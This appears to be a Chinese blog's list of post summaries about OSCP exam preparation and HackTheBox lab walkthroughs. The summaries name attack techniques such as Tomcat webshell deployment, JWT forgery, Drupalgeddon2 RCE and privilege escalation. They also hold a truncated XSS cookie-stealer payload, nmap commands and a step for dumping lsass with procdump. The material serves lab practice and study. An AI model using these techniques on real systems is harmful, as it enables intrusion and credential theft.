摘要:
有一段时间没发了,把准备oscp打的靶机walkthrough都放到gitee了,后面有更新也会直接放那边,就不 单独每篇发博客了。 gitee仓库地址:hackthebox_oscp 阅读全文
摘要:
git历史commit泄露密码,tomcat后台部署webshell,ansible playbook执行命令 阅读全文
摘要:
前言 记录一些打靶机过程中修改的脚本。 xss-cookie-stealer python3版本,就是一个服务端,实时输出访问日志(弹回来的cookie) python3 xss-cookie-stealer.py |tee log.txt 原仓库 使用方法 式例如下 <img src=x oner 阅读全文
摘要:
oscp考试中涉及到的缓冲区溢出一般流程,与实际练习。 阅读全文
摘要:
jwt token伪造,容器逃逸 阅读全文
摘要:
druppal geddon2 RCE,snap本地提权 阅读全文
摘要:
信息泄露,wordpress后台getshell, suid提权。PHP/8.1.0-dev后门 阅读全文
摘要:
端口扫描 nmap -sV -v -A ip nmap -sU ip #udp扫描,一般用不着,没思路了可以试试 windows权限检查 windows-privesc-check2.exe --audit -a -o wpc-report windows域相关 导出lsass procdump64 阅读全文